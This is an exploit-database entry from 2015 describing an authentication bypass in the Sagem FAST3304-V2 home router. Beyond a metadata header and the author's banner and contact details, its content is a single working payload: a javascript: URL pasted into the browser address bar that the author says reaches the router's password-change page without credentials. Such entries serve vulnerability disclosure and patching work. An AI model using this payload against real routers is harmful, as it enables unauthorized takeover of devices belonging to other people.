[] NeoSense

Sagem FAST3304-V2 - Authentication Bypass (2)

Author: Soufiane Alami Hassani
type: webapps
platform: hardware
port: 
date_added: 2015-10-28 
date_updated: 2015-10-28 
verified: 0 
codes: OSVDB-129762 
tags: 
aliases:  
screenshot_url:  
application_url: 

================================================================================
____ _    _    ____ _  _    ____ _  _ ___  ____ ____
|__| |    |    |__| |__|    |__| |_/  |__] |__| |__/
|  | |___ |___ |  | |  |    |  | | \_ |__] |  | |  \

================================================================================


######################################################
# Exploit Title: Sagem javascript injection
# Date: 27/10/15
# Exploit Author: Soufiane Alami Hassani
# Version: FAST3304-V2
# Tested on: [Windows 8.1 Pro]
# Category : webapps
# Facebook : soufiane.a.hassani
# Email    : nios1515@gmail.com
######################################################


###########################
#By Soufiane Alami Hassani#
###########################

Vulnerability Description : You can change the password of your router even if you have not the access.

Exploit : In Bar address copy and paste : "javascript:mimic_button('goto: 9096..')" the router redirect you to another page to change the password .

########################
Moroccan Are The Best .
########################


mimic_button('goto: 9096..')